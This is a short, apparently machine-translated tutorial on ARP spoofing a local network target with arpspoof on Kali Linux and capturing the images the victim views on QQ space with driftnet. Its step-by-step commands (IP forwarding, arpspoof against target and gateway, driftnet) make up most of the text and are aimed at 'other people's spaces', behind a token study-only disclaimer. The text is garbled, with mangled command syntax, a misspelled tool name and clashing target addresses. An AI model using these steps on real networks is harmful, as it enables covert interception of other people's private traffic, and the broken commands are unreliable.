ARP spoofing technology-obtain images of the Intranet destination IP addresses accessing the QQ space
The article is for study only. do not violate the law.
Requirement: Virtual Machine Kali linux System
Command "ip query command: ifconfigecho write command is not explicitly driftnet get local nic" Nic to view the image information of the NIC, for example, target ip Address: 192.168.1.100 Gateway: 192.168.1.1
Spoofing statement "Arpspoof-I nic-t target ip gateway, for example, arpsp00f-I eth0 192.168.1.100 192.168.1.1
Please understand the following two sentences: Arp spoofing the traffic of the target ip Address goes through my Nic, and the traffic of the target ip Address goes through my Nic
Step 1: "enable ip Forwarding" command: echo 1>/proc/sys/net/ipv4/ip_forward (Press enter without any return)
Step 2: "Start to cheat" command: arpspoof-I eth0-t 192.168.1.108 192.168.1.1 (continue to cheat running after the carriage return ~~~ [Remember to keep this window])
Do not close the window that appears in step 3 "view Target Image Information". You can view the information in the window. Command: driftnet-I eth0
Step 4: visit other people's spaces to get images.